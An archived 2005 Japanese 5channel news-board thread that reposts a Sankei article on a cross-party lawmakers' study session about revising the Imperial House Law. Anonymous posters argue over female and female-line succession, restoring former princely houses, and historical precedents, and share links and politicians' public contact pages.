5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【皇室】超党派議員が皇室典範勉強会…「何が問題点か理解している議員が少ない」現状

1 :諸君、私はニュースが好きだφ ★:2005/11/18(金) 08:07:42 ID:???0
 超党派の保守系議員でつくる「日本会議国会議員懇談会」は十七日、
都内で皇室典範改正問題についての勉強会を開いた。政府の「皇室典範
に関する有識者会議」の女性・女系天皇容認方針に賛成、反対の専門家
から意見を聴き質疑応答を行ったが、出席議員の反応はさまざま。政府
は次期通常国会に皇室典範改正案を提出したい意向だが、皇位継承に
関する基礎知識は国民に共有されておらず、「何が問題点かを理解して
いる議員も少ないだろう」(政府高官)というのが現状だ。

 この日は、女系天皇賛成派から高橋紘・静岡福祉大教授、反対派から
八木秀次・高崎経済大助教授が講師として出席。高橋氏は「女性天皇を
認め、継承順位は男女を問わず第一子とするのが分かりやすく、天皇に
対し国民の親近感がわくと思う」と主張した。
 これに対し、八木氏は「女系容認によって、政府・法律による正統性か
歴史的な正統性かをめぐり『南北朝』状態になることを恐れている。女系
は歴史的には天皇・皇族ではない」と指摘し、特別立法による旧宮家の
皇籍復帰を訴えた。

 議員懇は今月一日、有識者会議の方針について「国民の理解を超える
拙速さ」と批判、男系による皇位継承維持の検討も含めた慎重審議を
求める決議を採択。所属議員は二百三十八人を数え、国会審議への
影響力は小さくないとされる。
 ただ、十七日の勉強会では「女性・女系天皇容認やむなしの立場だ」
(自民党の大前繁雄衆院議員)、「これまでこの問題では女性天皇を
認めていいと思っていたが、八木氏の話は説得力がある」(同党の稲田
朋美衆院議員)など、意見はまとまっていない。
 国民の側も知識が十分ではないとみられるため、「皇位がどう継承
されているのか、国民に天皇制度の理解を求めない限り、(典範改正は)
非常に拙速だ」(民主党の鷲尾英一郎衆院議員)との意見も出された。

ソース(産経新聞)
http://www.sankei.co.jp/news/morning/18pol003.htm

2 ::2005/11/18(金) 08:08:45 ID:1PpVqjQ20


3 :名無しさん@6周年:2005/11/18(金) 08:10:22 ID:KAj5ckon0
サンケイテイストの味付けが効いてますね。

4 :名無しさん@6周年:2005/11/18(金) 08:21:06 ID:0soqHwAV0
>>民主党の鷲尾英一郎衆院議員
この人って自民の腐りぶりがいやで民主にいったっぽいね

5 :名無しさん@6周年:2005/11/18(金) 08:25:14 ID:FP9gM7vB0
>>特別立法による旧宮家の皇籍復帰

これでおk?

6 :名無しさん@6周年:2005/11/18(金) 08:25:42 ID:zFzsah+A0
> 所属議員は二百三十八人を数え、

こんなに所属してたのか。
この問題が広く論じられるためにもこれは良い動き。

7 :名無しさん@6周年:2005/11/18(金) 08:29:34 ID:gRp1Yn2U0
結局、女系には”わかりやすい”って理由しかないの?
そんな必要はないじゃん。

8 :名無しさん@6周年:2005/11/18(金) 08:31:25 ID:ehkhnnIx0
しかし、議員が勉強してちょっと理解しても
国民の多数がマスゴミにミスリードされてる
現状がカワランと世論に対して分が悪くなるね

なにせ相手は女性差別と結びつけようとしてるから

9 :名無しさん@6周年:2005/11/18(金) 08:36:44 ID:3/HlF1VP0
>>3
「ニートウヨ」というテイストだね。

10 :名無しさん@6周年:2005/11/18(金) 08:36:59 ID:h0iwx96p0
皇太子に長男生まれりゃこんなゴタゴタ解決ですよ。
皇室典範改正なんてありゃせん。どうやって愛子に継がせるかってんで改正すんだけど、
その次以降どうしようかってモメてんだよ。
たぶん長男生まれたら女性OK女系NGで円満解決です。

11 :名無しさん@6周年:2005/11/18(金) 08:40:25 ID:BfRnRawUO
「女系天皇」と言う言葉は存在しない。「別系天皇」と呼ぶべきだ。別系天皇を認めれば南北朝の再来は間違いない。

12 :名無しさん@6周年:2005/11/18(金) 08:42:38 ID:5CCkNmWz0
八木先生負けないでくだちい

13 :名無しさん@6周年:2005/11/18(金) 08:42:45 ID:ehkhnnIx0
>10
最後の一行のたぶん長男生まれたら
が、たぶんないやろからモメてんだよ

14 :名無しさん@6周年:2005/11/18(金) 08:50:04 ID:rg2cBkHU0
直系長子継承は政治家、役人の保身。
男系男子だと養子になるけど、
そのとき天皇の血統以外の人間を
養子にするという可能性がある。
いちおう旧皇族の養子候補だから
実はあなたは天皇の血統ではありません
ということになるともめる。
旧皇族男子全員DNA検査ということに
なれば何人にせものがでるかわからない。
愛子にしとけばもめることない。

15 :名無しさん@6周年:2005/11/18(金) 08:51:29 ID:QDlRVgAh0
皇族にはへんな取り巻きが多いからもめるんだよ。
イメージも悪くなるしね。
天皇家の親戚に天皇になりたいやつがいてそれを
3Kが後押ししているだけだろうが…

16 :名無しさん@6周年:2005/11/18(金) 08:53:21 ID:Ne9b+8Fz0
「何が問題点かを理解している議員も少ないだろう」

天皇の性別なんか、誰も問題にしてないっていうことではw
南北朝とか、いつの時代の話してるねんなと。

17 :名無しさん@6周年:2005/11/18(金) 08:53:35 ID:Lv9QbXlu0
紀子さんって今いくつだっけ?あと、一人二人生めそうな気がするが。
正直、いまの皇太子雅子夫妻が育てた子は、なんかイヤだし。

18 :名無しさん@6周年:2005/11/18(金) 08:54:51 ID:Rdkub0nt0
父系(男系)派も戦略考えた方がいいと思うけどね。

「まずは皇族の意見を聞け、
憲法違反と言うならどの条文に違反してるか言ってみろ」

これが一番反論できないと思う。


19 :名無しさん@6周年:2005/11/18(金) 09:00:41 ID:zX3ipxmu0
>>14
愛子は問題ない、男系の皇族であるのは間違いないからな、
問題は愛子の次、愛子の子が継ぐならそれは天皇ではない
別の王朝の誕生(但し愛子の夫が男系男子の皇族なら別)。

女系に反対してる人も女性に反対しているわけではない、
それは男女差別とか狭い視野の問題ではなく、皇統の
正当性という問題。

20 :名無しさん@6周年:2005/11/18(金) 09:08:33 ID:rg2cBkHU0
>>19
愛子の婿、養子でも男系男子を
条件にすると、検査の段階で皇統でないことが
発覚すると本人、その家族にとってはまずいのでは?
極秘にやるだろうけど、皇族、旧皇族の
枠内からははじきだされる。


21 :名無しさん@6周年:2005/11/18(金) 09:11:55 ID:+7jZ0x76O
この問題が良く分からない方は、下記をどうぞ。時間があれば、下も見て下さい。
http://www.geocities.jp/banseikkei/qa.html
http://www.geocities.jp/banseikkei/

八木氏が示す現実的な男系継承。旧宮家の皇籍復帰とは。
http://nippon.zaidan.info/seikabutsu/2003/01291/contents/309.htm

様々な意見とblogを集約したSite。
http://plaza.rakuten.co.jp/oo00wa00oo/diary/200510200000/
歴史と伝統、そして心情的に男系維持に賛成な方の意見。
http://blog.goo.ne.jp/kurokuragawa/e/d17e724705f700bdfbeeb75dc85e5552
有識者達に対する批判と意見。
http://kahkun3601.at.webry.info/200509/article_14.html

特定アジアを注視するSiteでも問題提起が。
http://kukkuri.jpn.org/boyakikukkuri/index.php?day=20051027
http://www.enpitu.ne.jp/usr4/bin/day?id=45126&pg=20051028

> 日本国の二千年を越える歴史を顧みれば、連綿たる万世一系の天皇が
> 治められて来た国なのです。(「万世一系」というのは、王朝が一つであるということです)
> このような国は世界中どこを探しても他にはありません。これは日本国の国体(国柄)
> であり、誇るべきものとして、その意義を子どもたちに教えるべきだと私は考えます。
http://hepoko.blog23.fc2.com/blog-entry-43.html
「どうしてそんなに(典範改正を)急ぐのか理解できない」 (外交評論家の加瀬英明氏)

「男系で一点の狂いもなかったから、神話の時代から皇室が続いた。
頼朝、信長もやらなかったことを、小泉内閣で、それほど皇室のことを
調べたこともない少数の人がやろうとしている」 (渡辺昇一・上智大学名誉教授)
天皇・皇室に関して。世界からの視点。日本人として最低限頭に入れたい基礎知識。
http://www.infosnow.ne.jp/~sevas/adult/japan/japan2.html

22 :名無しさん@6周年:2005/11/18(金) 09:14:49 ID:+7jZ0x76O
天皇『制』は廃止出来るが、天皇や皇統は存続し廃止出来ない。
同じく『制度』なら堀江天皇も可能ですし、皇統では無い
女系でも第三者でも法律や憲法を改正すれば天皇に成れるし、法律上の皇籍(皇統譜)にも入れる。
しかし、万世一系の皇統は制度外に存続するのです。
制度なら憲法改正すれば、誰でも私でも象徴なり天皇に成れます。(そんなのは、天皇では無いがね)
歴代天皇には即位の怪しい(非即位説)天皇も居るし、逆に「天皇だろ!」と解釈されてる皇統も存在する。
万世一系とは王朝なり制度では無く天皇の血統の事なのだから。王朝として制度としてのは寧ろ否定説が有力。

明記以前は家憲的な物は有るが、現在のように制度として天皇を規定はして無い。
律令も朝廷システムに入るかだから現在たは違い、やはり家憲的な定義で、それの下に入るかの問題。
江戸時代の諸法度は天皇の権限を縛る物で天皇を規定してる訳では無く、

『其処に天皇が存在してる』からと言う物です。
それでも皇統と言うのですから。
例えばダライラマは、中国が別の法王を即位しても、
チベット人やチベット仏教徒の大半は、制度外のダライラマを法王と考えてる。

バチカンやローマ法王が廃止に成ってもペトロの弟子の系譜(ローマ法王)は存続する。

ハプスプルグロートリンゲン家は現在も存続してる。
まして、祭祀や神話の継承系譜の皇統は尚更存続する。
制度は所詮制度でしか無いのです。制度は改正も廃止も復活も再改正も自由です。
時の政権による体制や書類名義を支持してる訳でも無いし、
私は女系に成ったのなら制度外の皇統の名義への復活の運動をします。
江戸時代は君営システム(民営?)の下に幕府が入った。
制度外の天朝、天主の下に名義天皇を置いた事にしても良い。(名目的に)


23 :名無しさん@6周年:2005/11/18(金) 09:15:00 ID:HVWxuVp30
>>20
言ってる事意味不明


24 :名無しさん@6周年:2005/11/18(金) 09:18:34 ID:+7jZ0x76O
13:無党派さん :2005/11/06(日) 17:46:59 ID:0Rh0ZTdY [sage]
廃止では無く、未来にでも正統の名義への復活を主張し
運動、教道(明治に廃止、禁止に成った神道の教道職の復活)すれば良い。
制度は所詮制度で有って廃止も改正も再改正も自由ですからね。
制度としては残っていても正統の復活にはやりやすいかもね。
女系の名義天皇が正統に頭を下げ「天皇陛下」と言ったりとか、
現在も行われてる勅使の形態を、正統にお伺いをたてるとかの名目にしても法的には問題が無いしね。
現在も勅使が神に頭を下げ、宇佐では神主が「天皇」と呼び捨てにして勅使に命じる儀式も在るみたいですしね。

(但し天皇は仏教とも関わりが現在でも深く繋がりが有るので
神道のでは無く、神道や様々な団体を下に置く朝廷式のが良い)

また、名義天皇が正統を「天皇陛下」と呼んだり、
現在、行われてる勅使を正統にお伺いをたてる形式に替えたりしたら旨く良くよ。
菊栄会や宮中祭祀など関わりも深いから意思疎通出来るしね。
愛子様が嫌とか正統に頭を下げたりして。
今も宇佐では神主が勅使に「天皇」と呼び捨てにして馬を降りさせる儀式が有るしね。
また明治に禁止、廃止された教義や口伝を復活しても良いしね。
(聖書や仏典みたいに口伝の編纂をするべき)
勿論、正統天皇は宗教では無く、君営(民)朝廷の形ね。
あと、神社の長では無く、神社や一部仏教や団体、宗教、人を傘下に治める。
徐々に増やす。布教や活動してね。
国際運動もする。
50年くらいで独立亡命朝廷を世界各地に創れるくらいにしたいね。
正統な朝廷として。
少しずつでも徐々に正統を伝えて未来の復活を目指そう。
数十年後にはアメリカ、中国、インド、欧州の大国には正統による朝廷の支部を創って協力を働きかけたいね。
最後に、私が個別に正統な神武皇統を担ぐ事は無い。
正統の長は菊栄親睦会や神社や露会や各種団体なり、
書類名義以外も含めた皇統に属してる人が決めた事を優先しますので。


25 :名無しさん@6周年:2005/11/18(金) 09:20:02 ID:shiG+dy20
皇統外なのに女系という理屈がわからん
男系女天皇は女性天皇で問題ないだろに
なぜ直系や女系という自己欺瞞や錯誤をマスゴミと有識者会議が、一緒にやらかすのか
政治家にも気付いてるやつはおるのに、それをわざと黙ってる理由は何か

26 :参考にしてください。:2005/11/18(金) 09:20:53 ID:+7jZ0x76O
http://mimizun.com/cgi/dattohtml.pl?http://mimizun.com:81/log/2ch/asia/tmp5.2ch.net/asia/kako/1118/11189/1118977539.dat
 http://nagane.kimono.gr.jp/hideki/messages/27_title_msg.html
http://www.angelfire.com/journal2/hikojuro/
http://www1.ncv.ne.jp/~amu/page015.html
http://www.xxxx.nu/upload/upload/nabi/uppp17666.jpg


27 :欧州も氏族、家系は男系主義が基本。特に後半を読んでね。:2005/11/18(金) 09:24:41 ID:+7jZ0x76O
965: 2005/10/31 18:47:08 P6NXumH6 [sage]
>>962
http://sylphys.ddo.jp/upld2nd/news/img-box/img20051028230808.jpg

これを観せれば良いよ。
印象操作で愛子様の子が天皇に成れるか成れないかにすり変わってるから。
別の系統に成るかが問題なのに、男女とか愛子様の子がどう成るとか問題が違うのに。
矮小化して、愛子様の子がどうなるかとしか言わないしね。
別系統に成るのが問題なのに矮小化してる。
984: 2005/11/01 01:58:20 Q9V6PeSM [sage]
>>974
アナタの方が屁理屈ですよ。その独自の解釈は無意味です。
そもそもイギリス王統なんて無いです。
ウインザー系統が王位に就いてるとの考え方です。
>女王で繋いできた王家は、その王家の血脈はスッポリ抜けてしまう。
その通りです。イギリスは>>965を繰り返してるのです。
大体、ドイツから来た家系で、初代イングランド公(王)の系統では無いです。
王朝変更は頻繁です。勿論王朝名称の明記はどうにでも成るので、
次もウインザー朝に成るかウインザー・マウントバッテン朝に成るかは分かりませんけど。

書類的にはウインザー朝のままが有力ですがどうなるかは分かりません。

チャールズ・フィリップ・アーサー・ジョージ・マウントバッテンと名乗ってる事からも男系の意味も含まれてます。
ウインザー朝のままでも単なる名称でしか無く、別の系統と理解されます。
例えば、真宗興正寺派法主家の華園家は藤原朝臣ですが、
江戸時代に別れた皇統(男系)の血を引いてるので皇胤とも言われてます。
名称は自由ですが、系統原理は世界中に有るのですよ。
徳大寺も藤原ですが皇統ですしね。
因みにイギリスは、エリザベス女王の夫のフィリップ殿下にも王位継承権が有る。
つづく


28 :名無しさん@6周年:2005/11/18(金) 09:26:48 ID:ehkhnnIx0
有識者会議とこの勉強会とでタイゾーに
プレゼンさせてどっちが日本の国として
有意義か選ばせたりするのもおもろいかも

タイゾーの正体もはっきりするし

29 :名無しさん@6周年:2005/11/18(金) 09:26:51 ID:rg2cBkHU0
>>23
改正皇室典範を無視して憶測で
旧皇族男子の復帰手順をかくと、
一、復帰候補者のリストアップ
二、本人の意思確認。
三、身体検査(DNA鑑定、血液検査)

このときDNAに異常があると皇統でないことになる。
当然、候補からはずれいままでの社会的地位を失う。



30 :名無しさん@6周年:2005/11/18(金) 09:27:03 ID:N3IrYCuX0
やらないよりはマシなんだが
国会議員が今さら勉強会とは
情けないな

31 :名無しさん@6周年:2005/11/18(金) 09:27:54 ID:+7jZ0x76O
>>27の続き。
985: 2005/11/01 02:10:57 Q9V6PeSM [sage]
>>984の続き。
欧州は王位(名義)と家(王侯貴族)が別れて存在していて、
王侯貴族の家や系統は男系主義の系統原理から継承されています。
王位にどの系統の王侯貴族が就くかみたいな感じです。
だから王位自体は母“方”(女系では無い)の血筋が入ってた場合は、一見女系に見えますが、
家系自体は別の男系の傍系が継いだりもします。

例えば、女系に見えるハプスブルグ家とハプスブルグ・ロートリンゲン家は別の家系です。

王位(大公位)、皇位(非即位も含)は母“方”(系統では無く)の血筋継いでる為に誤解されますけど、

つまり欧州では家系はその家の系統が継いでます。
だから自国に相応しい名門の貴族の家系に自国の国王を継いで貰う事も有るのです。
日本の藩主みたいな感じですね。
スペイン王位がどうであれブルボン家は男系系統により繋ぐ家系です。
(ブルボン家=スペイン王位では無い。王位にブルボン系統が就いてる)
欧州は他国から王位(諸侯)に就く貴族をもってくる事も有る。
日本も同じです。天皇とは祖始(神武か天照と規定)からの系統を制度にしてるのです。
制度名義が代わっても、神武皇統は制度外に存続しますが、書類名義上は別系統に成るのです。
神武皇統と名乗っても、書類名義でしか無く、
神武皇統の正統は制度名義外に存続する男系子孫です。
986: 2005/11/01 02:18:52 Q9V6PeSM [sage]
>>985だけど、現在、欧州で活躍してるのはハプスブルグ・ロートリンゲン家の系統です。

ハプスブルグ家は断絶してます。
(男系子孫が居るのかもしれませんので一応、多分を付けさせて貰います)



32 :名無しさん@6周年:2005/11/18(金) 09:28:43 ID:7HWVXp280
稲田朋美は知ってたくせにしらじらしく答えてるなぁ
まあGJだけどw


33 :名無しさん@6周年:2005/11/18(金) 09:32:24 ID:+7jZ0x76O
105:名無しさん@6周年 2005/10/21 18:19:23 RteD3dH5O [sage]
81
理解すると思いますよ。系統なんて一般でもよく有りますから。
天皇以外でも一般的にも泰氏の系統、源氏の系統、藤原の系統などと言う人は多いですが、その系統をどのように遡ってるかを見ればね。
因みに系統原理を元に姓や苗字は存在しますが、姓や苗字は、系統を表すシステムでありますが、姓=系統ではありません。
例えば、藤原朝臣で有っても皇胤は存在します。
真宗興正寺派の法主家の華園家は藤原(姓)で有り、華園(苗字)で有り、天皇の男系子孫(皇胤)だからです。
華園家は男系で遡ったら天皇に行き着きますが、藤原姓でも有るので、系統=姓では無いのですけど。
124:名無しさん@6周年 2005/10/21 18:29:14 RteD3dH5O [sage]
105の続きですが、
真宗の内事章範から
   第一章 門首の継承
(門首継承の順序)
第一条 門首は、世襲により宗祖の血統に属する嫡出の男系の男子が次の順序により継承する。
 一 門首の長子
 二 門首の長子の長子
 三 門首の長子の子孫
 四 門首の次子及びその子孫
 五 前各号以外の門首の子孫
2 前項各号に該当する者がないときは、門首は、最近親の血統の男子がこれを継承する。
これは真宗大谷派だけど、本願寺派(西)も同じ 。
大谷家って天皇家の親戚だっりするんだよね。
このように一般でもよく有ります。
因みに真宗は養子で対応してますね。
真宗は革命思想の左翼僧侶も多いけどね。
西村慎吾みたいな門徒の方が保守的だったりもする。
男系支持を頼むなら浅草門跡ですね。
浅草には天牌も有りますしね。(本廟と間違えないように)


34 :名無しさん@6周年:2005/11/18(金) 09:37:34 ID:Lv9QbXlu0
>「女性天皇を認め、継承順位は男女を問わず第一子とするのが分かりやすく、
>天皇に対し国民の親近感がわくと思う」と主張した

男だろうが女だろうが世襲制を認める以上は、既に「平等」なんて枠からは
例外的な存在なんだよ。「天皇の子だから」ということを権威のよりどころ
にしてる以上、古来からの「血統」が、権威の唯一の根拠。
その唯一の存在根拠を断とうというのだから、発言が自己矛盾してんだよ。
血統が切れてもいいというなら、そもそも「天皇の子」であるべき理由もない。
そのへんのタレントでいいじゃん。「親近感」あるし。

35 :名無しさん@6周年:2005/11/18(金) 09:38:06 ID:AU0BWy4L0
日本が良くなっていく…有り難いことです。議員の諸君も政党の枠組みを超えて取り組むべきなのを
承知しているみたいで頼もしい。

36 :名無しさん@6周年:2005/11/18(金) 09:40:32 ID:+7jZ0x76O
■女性・女系天皇反対、男系男子維持、旧宮家復籍すべしの突撃先(議員)■

安倍内閣官房長官 http://newleader.s-abe.or.jp/modules/contact/

神道政治連盟国会議員懇談会 http://www.sinseiren.org/ouen/kokugikon.html

自民党新人議員 http://www.powup.jp/jinken/list/

全国議員サイト http://gikai.fc2web.com/

国民新党 http://www.kokumin.biz/ ※ご意見箱に書込可

自民党本部 http://www.jimin.jp/
〒100-8910 東京都千代田区永田町1-11-23
      TEL 03-3581-6211 FAX 03-5511-8855
    自民党本部・公聴室:03-3581-0111
     自民党に物申す:http://www.jimin.jp/jimin/main/mono.html
新憲法制定推進本部:https://youth.jimin.or.jp/kenpou/index.html

首相官邸 http://www.kantei.go.jp/
     TEL 03-3581-0101
     ご意見募集 http://www.kantei.go.jp/jp/forms/goiken.html
     小泉内閣メールマガジン(首相メールマガジンの意見欄も直接首相に届く)
      http://www.kantei.go.jp/jp/m-magazine/index.html

内閣官房 内閣総務官室 「皇室典範 有識者会議」宛
 http://www.cas.go.jp/index.html
      〒100-8968 東京都千代田区永田町1-6-1
      TEL 03-5253-2111 FAX 03-3581-7238
      ご意見募集 http://www.iijnet.or.jp/cao/cas/jp/goiken.html
民主党や自民党や公明党の『国会議員を中心』に優先してお願いします。


37 :名無しさん@6周年:2005/11/18(金) 09:42:59 ID:jkJLsYnx0
>>1
>特別立法による旧宮家の皇籍復帰を訴えた。

なるほど。旧宮家の皇籍復帰は特別立法だけで
皇室典範を改正しなくてすむのか。
これが一番合理的な解決策だね。

38 :名無しさん@6周年:2005/11/18(金) 09:43:54 ID:/C1Urpol0
女子が生まれないのは
天命だと思うのだがどうだろうか。

39 :名無しさん@6周年:2005/11/18(金) 09:49:49 ID:+7jZ0x76O
153:名無しさん@3周年 :2005/11/11(金) 02:41:14 ID:YFay6VMx [sage]
>>16
脳内妄想乙。勝手に国民を語らないのと、レッテルじみた事を張らないよつに。
>知らない・・・
って、エ〜天皇って知名度だったんですか。なら、マスコミに取り上げて貰わないとね。
先ず連れてくるにしても子供だから。しかも、天皇即位はその子供とか、もしくは女性皇族との間に出来た子です。 前提が違う。
それに、天皇とは今上陛下のみへの個人崇拝では無い。
「あの方の血を〜」みたいな個人崇拝のものでは無いですよ。 
今上陛下も歴代天皇全ての血を引いてる訳では無い。
それに直系主義は無理なのです。愛子様に子が産まれるとも限らないしね。
悩み苦しませるだけに成る。女系強要派は天皇家の事も個人の事も考えない人ばかりですね。
それに知名度とか親しみとかマスコミです。
それで、選ぶならマスコミが継承順位を選べば良い事でしょ。
感想で皇統の正統は決まらない。
568:名無しさん@6周年:2005/11/02(水) 23:56:39 ID:gzL6Sag30 [sage]
・現天皇家も所詮傍系の一族。
・天皇という位は傍系を渡り歩くのが自然な姿。
・男系というルールが有史以来続くルールである。
この辺を国民に知らしめれば、ルールを重んじる日本人なら男系維持で納得すると思う。


40 :名無しさん@6周年:2005/11/18(金) 09:52:54 ID:XFWxpAVF0
>>37
激しく同意!

とりあえず旧宮家を復籍しておく。
そうすれば適齢期が近付いてくる内親王・女王方のお相手として
安心して考えられる(結婚はもちろん両者の合意が必要だが)

具体的な継承方法などは、復籍の後「皇統維持委員会(審議会)」という
ようなものを立ち上げてゆっくり、じっくり検討すれば良い。

皇太子→秋篠宮で40年ぐらいは時間が稼げるだろう。
何も今慌てて決めることではない。


41 :名無しさん@6周年:2005/11/18(金) 09:53:10 ID:i4o5Cc1d0
とりあえず「女性」天皇は認めるようにして変な批判はかわすべきだな

42 :名無しさん@6周年:2005/11/18(金) 09:54:05 ID:VYHGgqIq0
今の皇太子の次は、秋篠宮様、そして秋篠宮様と紀子様にもう一がんばりしてもらって、
男児誕生。それでめでたし、めでたし。


43 :名無しさん@6周年:2005/11/18(金) 09:54:27 ID:8HkzUx0d0
>>38
男の生殖能力は70歳以上でも大丈夫だ
後、25年以内に男が生まれれば良いだけ
皇室典範改正の話は25年後に生まれてなければそこで話し合えば良い

44 :名無しさん@6周年:2005/11/18(金) 10:01:03 ID:rzPrg2W80
女帝容認の流れは変えられないと思うけどね。
日本国民のほとんどが女性天皇容認する事の何が問題なのかわかってないし。

45 :名無しさん@6周年:2005/11/18(金) 10:03:24 ID:zX3ipxmu0
>>38
天命というのは打てるべき手を全て打って、最大限の努力をして
その上で最後に待つものだと思うのだがどうだろうか。

近頃何も努力をしないことの正当化に運命とか天命とか持ち出す
輩が多すぎませんか?

46 :(´-`).。oO ◆abcDBRIxrA :2005/11/18(金) 10:03:34 ID:bfblzWaF0
皇位は、原則として天皇の子またはその孫に継承される。例外はきわめて少ない。以下の7例のみ。

第26代継体天皇は応神天皇のひひひ孫(5親等、6代目)、皇后は第24代仁賢天皇の娘(皇女・内親王)
第27代安閑天皇は応神天皇のひひひひ孫(6親等、7代目)、皇后は第24代仁賢天皇の娘(皇女・内親王)
第28代宣化天皇は応神天皇のひひひひ孫(6親等、7代目)、皇后は第24代仁賢天皇の娘(皇女・内親王)
第35代皇極(斉明)天皇は敏達天皇のひ孫、舒明天皇の皇后。未亡人の女帝
第36代孝徳天皇は敏達天皇のひ孫、皇極女帝の弟。
第102代後花園天皇は崇光天皇のひ孫、後小松上皇の養子となり、即位後しばらくは院政
第119代光格天皇は東山天皇のひ孫、後桃園天皇の養子となり、後桃園天皇の娘(内親王)を皇后とする

第48代称徳天皇と第49代光仁天皇はきわめて間の離れた親戚だが、光仁天皇は天智天皇の孫。
天武・持統系を基準にすると光仁天皇は傍系だが、天智系を基準にすると直系の孫になる。
皇位の継承には、血の濃さも重要な要素。天皇の孫よりも血の薄い皇族が、無条件で即位した前例はない。
男系男子ならば誰でも良いというような、単純なものではない。

47 :名無しさん@6周年:2005/11/18(金) 10:07:20 ID:+7jZ0x76O
>>46
それは“副因”ね。
第一条件は天皇系統。
しかし、副因も有るので、歴史的に傍系への移行時には、
時の天皇家との婚姻を結んだりする事がよく有る。


48 :名無しさん@6周年:2005/11/18(金) 10:07:24 ID:XFWxpAVF0
「女性」も「女系」も反対。

おれは直系に対する思い入れなんて全然ない。
それより天皇たる者、神武天皇以来の皇統以外、有り得ない。(当たり前だが)
正統な男系男子の継承のみで充分だ。(当然だが)


49 :名無しさん@6周年:2005/11/18(金) 10:07:55 ID:zX3ipxmu0
>>44
解ってるじゃないか、つまりマスゴミや行政が女系天皇の問題点を
しっかりと国民に周知徹底することが先決って事だ。
で、君も偉そうに言って間違えてるよ、女性天皇は容認どころか
このスレの住人も女系天皇に反対する議員達ですら反対してないと
思われるが?

女性と女系をわざと混同させるのはマスゴミだけにしてくれ、皇太子、
秋篠宮、最悪その次に愛子でも構わない、問題はそのあとだよ、
逆に言えば愛子が80まで生きるとすればあと75年以上猶予はある、
取り柄合えず女系ではなく女性天皇だけを皇室典範改正で認めて
おけばそう慌てる必要は何処にもない、まぁ女性を認めなくても
皇太子−秋篠宮で40年は大丈夫だろうし。

50 :名無しさん@6周年:2005/11/18(金) 10:08:00 ID:Lv9QbXlu0
人工授精とか産み分けとかできる時代なんだから、
そのへん、こっそりなんとかできないのか。

51 :名無しさん@6周年:2005/11/18(金) 10:10:17 ID:GHSwdQrc0
>>44
継承の条件を、
「男系の男子」から、「男系の男女」に変える手もある。



52 :名無しさん@6周年:2005/11/18(金) 10:12:07 ID:H8R7bfZI0
>>49

今般の皇室典範改変の議論を見ていますと、伝統を重視する立場を表明
する男系派からも、
・女性天皇容認(女系天皇には反対だが、女性天皇は問題なし)
・終身在位の否定(生前譲位の容認)
・改元の制限
などの主張が聞こえてきます。

明治の皇室典範制定の議論、皇室典範に込められた精神を省みることな
く、“過去に例があった”ということを根拠に現典範の改変を考えるこ
とは、政府、有識者会議の姿勢と同様に歴史、先人の積み重ねを軽視す
る、伝統破壊の所業になるものと考えます。

過去に女性天皇の例がありながら、なぜこの際にこうした事例が採用さ
れなかったのか。
明治の皇室典範は、こうした事例、歴史、先人の判断の重みを十分に踏
まえた形で制定されたものであり、この典範の精神をよく吟味し、様々
な伝統、事例の中から、何を守り、何を変え、いかに発展洗練されてき
たのかを読み解くことが重要と考えます。

長根氏掲示板 「皇位継承と和の心」
 http://nagane.kimono.gr.jp/hideki/mess/nippon/


53 :名無しさん@6周年:2005/11/18(金) 10:12:25 ID:lEPaqJrL0
>1「これまでこの問題では女性天皇を認めていいと思っていたが、八木氏の話は説得力がある」(同党の稲田朋美衆院議員)など、意見はまとまっていない。

げっ、知らなかったのか。

54 :名無しさん@6周年:2005/11/18(金) 10:12:42 ID:Rdkub0nt0
>>44
8人の過去の女性天皇は在位中は独身だった。
生涯独身だった方も3人。

愛子様の結婚を許すにしても結婚相手が見つかると思うのか?

という論法がいいかな。

また雅子様、愛子様可哀想、ってのもおかしいよね。
女性天皇を容認する方がよっぽど可哀想だ。

男子を生む義務があるという重圧から解放し、負担の大きい女性天皇
から愛子様を解放するためにも、旧宮家を復活させるべきなのだが。

そういうことを訴えていく方がいいと思う。


55 :名無しさん@6周年:2005/11/18(金) 10:15:05 ID:z763D3oG0
俺も最近やっと女系だの男系だの理解した
たぶん国民の95%は理解してないでしょう

56 :名無しさん@6周年:2005/11/18(金) 10:20:31 ID:Rdkub0nt0
>>55
理解していないだろうねー。
愛子様の子供が天皇になったら女系天皇って「勘違い」している人
もいるだろうから。
それは女系ですらない。
「皇統外」

57 :名無しさん@6周年:2005/11/18(金) 10:20:44 ID:8HkzUx0d0
>>54
それはリアルな真実なんだが
女系推進派(天皇廃止論者)はジェンダーを利用してるので
愛子を侮辱してると攻撃して来るよ。
皇太子夫婦は既に破綻してるので、お互いの幸せの為にという名目で離婚を推奨する方が良いかもw

58 :名無しさん@6周年:2005/11/18(金) 10:22:13 ID:jkJLsYnx0
>>46
>皇位は、原則として天皇の子またはその孫に継承される。

天皇の子が直系の子孫という意味なら、そんな原則はない。
皇統譜を見れば天皇の兄弟間での継承、すなわち傍系継承は
いくらでも実例がある。
しかし女系の例は一例もない。すべて男系の子孫だ。
内親王と男系男子との婚姻ができるなら望ましいが、皇婿は
男系男子であることが必須条件である。
この条件が満たされたなら女帝も容認できる。

59 :名無しさん@6周年:2005/11/18(金) 10:23:34 ID:zX3ipxmu0
>>48
女系は俺も反対だが、女性に反対する理由は? 歴史上これまでも
中継ぎ的に男系女子が天皇を継いだことはあるぞ。
愛子が中継ぎ的に天皇を継ぐことには制度的な問題は何ら無い、
法律的な問題があるだけだ、女系天皇は制度的にも法律的にも
問題がある、両者は全く違う問題。

60 :名無しさん@6周年:2005/11/18(金) 10:25:44 ID:Rdkub0nt0
>>54
まあね。

女性天皇を認めつつ、旧宮家復活の道を探るのが現実的
な落としどころなのかもね。

しかし女性天皇を認めつつも、
女性が宮家を作るのも阻止しないといかんから面倒だ。

サーヤの立場はどうなる?と訴えるのがいいのか?
じゃあ黒田家も宮家にとか言われそうだな。

61 :名無しさん@6周年:2005/11/18(金) 10:26:17 ID:+7jZ0x76O
>>55
提言だけど、一般に理解して貰うは、女系、女性を分かりやすくとかじゃ駄目だよ。
皇統纂奪とか王朝変更とかワンフレーズの分かりやすいのじゃ無いと。
あと、女系反対だけだと、他に方法が無いみたいで、天皇制度廃止か女性天皇容認かの2択に成る。
養子など他の方法も有る事を詳しく丁寧に、皇統の意味と共に提案しないといけない。
寛仁親王の養子方式などの表現をマスコミは無視してるからこうなる。
だから、女性、女系か解るようにでは無く、男系維持の方法や男系の意味を伝えるように主張しないと。
あと、女系と言う表現が解りにくいから誤解される。
